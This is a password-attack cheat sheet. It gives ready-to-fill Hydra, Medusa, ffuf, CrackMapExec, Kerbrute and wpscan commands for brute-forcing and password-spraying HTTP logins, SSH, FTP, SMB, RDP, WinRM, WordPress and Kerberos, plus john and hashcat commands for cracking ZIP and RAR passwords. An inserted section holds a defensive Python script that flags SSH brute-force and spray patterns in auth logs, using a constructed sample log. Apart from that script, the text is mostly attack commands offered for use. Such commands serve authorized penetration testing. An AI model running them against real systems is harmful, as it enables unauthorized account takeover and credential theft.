Wordlists
/usr/share/wordlists/SecLists/..
/usr/share/wordlists/rockyou.txt
/usr/share/wordlists/fasttrack.txt
Rules:
/usr/share/hashcat/rules/best64.rule
/usr/share/hashcat/rules/rockyou-30000.rule
HTTP LOGIN
FFuF
ffuf -u <url> -w <wordlist.txt> -X POST -d "username=<username>&password=FUZZ" <filter>
FILTER OPTIONS:
-fc Filter HTTP status codes from response. Comma separated list of codes and ranges
-fl Filter by amount of lines in response. Comma separated list of line counts and ranges
-fmode Filter set operator. Either of: and, or (default: or)
-fr Filter regexp
-fs Filter HTTP response size. Comma separated list of sizes and ranges
-ft Filter by number of milliseconds to the first response byte, either greater or less than. EG: >100 or <100
-fw Filter by amount of words in response. Comma separated list of word counts and ranges
Hydra
hydra -l <username> -P <passwords.txt> <IP> http-post-form "/login:username=^USER^&password=^PASS^:F=Login failed !" -V
Basic Auth HTTP:
hydra -l <username> -P <passwords.txt> -f <IP> http-get
Basic Auth HTTPS:
hydra -l <username> -P <passwords.txt> -f <IP> https-get
FTP
Hydra
hydra -l <username> -P <passwords.txt> <IP> ftp
hydra -L <username.txt> -p "<password>" <IP> ftp
Medusa
medusa -h <IP> -U <username-list> -P <password-list> -M ftp -T <thread-count>
SSH
Hydra
hydra -l <username> -P <passwords.txt> -s 22 <IP> ssh
hydra -L <usernames.txt> -p "<password>" -s 22 <IP> ssh
Medusa
medusa -h <IP> -U <username-list> -P <password-list> -M ssh -T <thread-count>
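The two Hydra shapes above (`-l <user> -P <list>`: one account, many passwords; `-L <list> -p <password>`: many accounts, one password) leave distinct footprints in sshd logs. The following added example, not part of the original cheat sheet, groups OpenSSH "Failed password" lines by source address and labels each noisy source as a dictionary attack or a password spray. Log lines, thresholds and field names are constructed for the demonstration.

```python
import re
from collections import defaultdict

# OpenSSH failed-login line in default syslog layout (constructed format, see SAMPLE_LOG).
FAILED_RE = re.compile(
    r"^\w{3}\s+\d+\s[\d:]+\s\S+\ssshd\[\d+\]:\s"
    r"Failed password for (?:invalid user )?(?P<user>\S+) from (?P<src>[\d.]+)"
)

def detect_bruteforce(lines, min_attempts=5, spray_min_users=3):
    """Group failed SSH logins by source IP and classify the attack shape.

    Returns {src: {"attempts": n, "users": m, "pattern": p}} for every source
    with at least min_attempts failures. 'dictionary' = few accounts hit with
    many passwords (hydra -l/-P); 'spray' = many accounts, few tries each
    (hydra -L/-p). Thresholds are assumed values, tune them per environment.
    """
    per_src = defaultdict(lambda: {"attempts": 0, "users": set()})
    for line in lines:
        m = FAILED_RE.search(line)
        if not m:
            continue  # not a failed-password event; ignore
        rec = per_src[m["src"]]
        rec["attempts"] += 1
        rec["users"].add(m["user"])
    findings = {}
    for src, rec in per_src.items():
        if rec["attempts"] < min_attempts:
            continue  # isolated typos stay below the alert threshold
        pattern = "spray" if len(rec["users"]) >= spray_min_users else "dictionary"
        findings[src] = {"attempts": rec["attempts"],
                         "users": len(rec["users"]), "pattern": pattern}
    return findings

def _line(n, user, src, invalid=False):
    """Build one constructed sshd failure line; n only varies pid/port/seconds."""
    who = f"invalid user {user}" if invalid else user
    return (f"Mar  3 10:01:{n % 60:02d} bastion sshd[{1200 + n}]: "
            f"Failed password for {who} from {src} port {40000 + n} ssh2")

# Constructed sample log (not a real capture): one dictionary run, one spray, one stray failure.
SAMPLE_LOG = (
    [_line(i, "admin", "10.0.0.5") for i in range(6)]
    + [_line(10 + i, u, "10.0.0.9", invalid=True)
       for i, u in enumerate(["alice", "bob", "carol", "dave", "erin"])]
    + [_line(20, "ops", "10.0.0.7")]
)

if __name__ == "__main__":
    for src, info in detect_bruteforce(SAMPLE_LOG).items():
        print(src, info)
```

Feed it real lines with `detect_bruteforce(open("/var/log/auth.log"))`; a spray that rotates source addresses will need grouping by password-attempt time window instead of by `src`.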
SMB
CrackMapExec (preferred)
crackmapexec smb <IP> -u <usernames.txt> -p <passwords.txt> --continue-on-success
Hydra
hydra -l <username> -P <passwords.txt> <IP> smb
hydra -L <usernames.txt> -p "<password>" <IP> smb
RDP
Hydra
hydra -l <username> -P <passwords.txt> <IP> rdp
hydra -L <username.txt> -p "<password>" <IP> rdp
WinRM
CrackMapExec
crackmapexec winrm <IP> -d <domain-name> -u <usernames.txt> -p <passwords.txt>
WordPress
Hydra
hydra -l <username> -P <passwords.txt> <IP> -V http-form-post '/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log In&testcookie=1:S=Location'
Medusa
medusa -h <target-ip> -U <username-list> -P <password-list> -M smbnt -T <thread-count>
Kerberos
Kerbrute
kerbrute userenum --dc <domain-controller-ip> -d <domain-name> <username-list>
WordPress
wpscan --url <url-login-page> -U <users.txt> -P <passwords.txt>
ZIP
john the ripper
zip2john <zip-file> > zip-hash.txt
john --format=zip zip-hash.txt --wordlist=<wordlist.txt>
hashcat
hashcat -m 13600 <hash-file> <wordlist.txt>
RAR
unrar
unrar x -p<password> <rar-file>
john the ripper
rar2john <rar-file> > rar-hash.txt
john --format=rar rar-hash.txt --wordlist=<wordlist.txt>
hashcat
hashcat -m 12500 <hash-file> <wordlist.txt>